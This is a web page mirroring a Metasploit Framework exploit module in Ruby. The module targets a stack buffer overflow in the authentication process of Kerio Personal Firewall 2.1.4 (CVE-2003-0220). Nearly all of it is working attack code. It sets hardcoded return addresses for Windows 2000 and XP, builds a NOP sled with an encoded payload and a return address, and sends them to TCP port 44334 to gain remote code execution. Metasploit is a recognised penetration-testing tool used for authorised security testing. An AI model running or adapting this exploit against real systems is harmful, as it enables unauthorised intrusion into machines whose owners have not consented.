Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/firewall/kerio_auth.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Kerio Firewall 2.1.4 Authentication Packet Overflow',
16
'Description' => %q{
17
This module exploits a stack buffer overflow in Kerio Personal Firewall
18
administration authentication process. This module has only been tested
19
against Kerio Personal Firewall 2 (2.1.4).
20
},
21
'Author' => 'MC',
22
'License' => MSF_LICENSE,
23
'References' => [
24
['CVE', '2003-0220'],
25
['OSVDB', '6294'],
26
['BID', '7180']
27
],
28
'DefaultOptions' => {
29
'EXITFUNC' => 'process',
30
},
31
'Payload' => {
32
'Space' => 800,
33
'BadChars' => "\x00",
34
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
35
},
36
'Platform' => 'win',
37
'Targets' => [
38
[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
39
[ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ],
40
[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ],
41
],
42
'Privileged' => true,
43
'DisclosureDate' => '2003-04-28',
44
'DefaultTarget' => 0,
45
'Notes' => {
46
'Reliability' => UNKNOWN_RELIABILITY,
47
'Stability' => UNKNOWN_STABILITY,
48
'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
}
50
)
51
)
52
53
register_options(
54
[
55
Opt::RPORT(44334)
56
]
57
)
58
end
59
60
def exploit
61
connect
62
63
print_status("Trying target #{target.name}...")
64
65
sploit = make_nops(4468) + payload.encoded
66
sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV')
67
68
sock.put(sploit)
69
sock.get_once(-1, 3)
70
71
handler
72
disconnect
73
end
74
end
75
76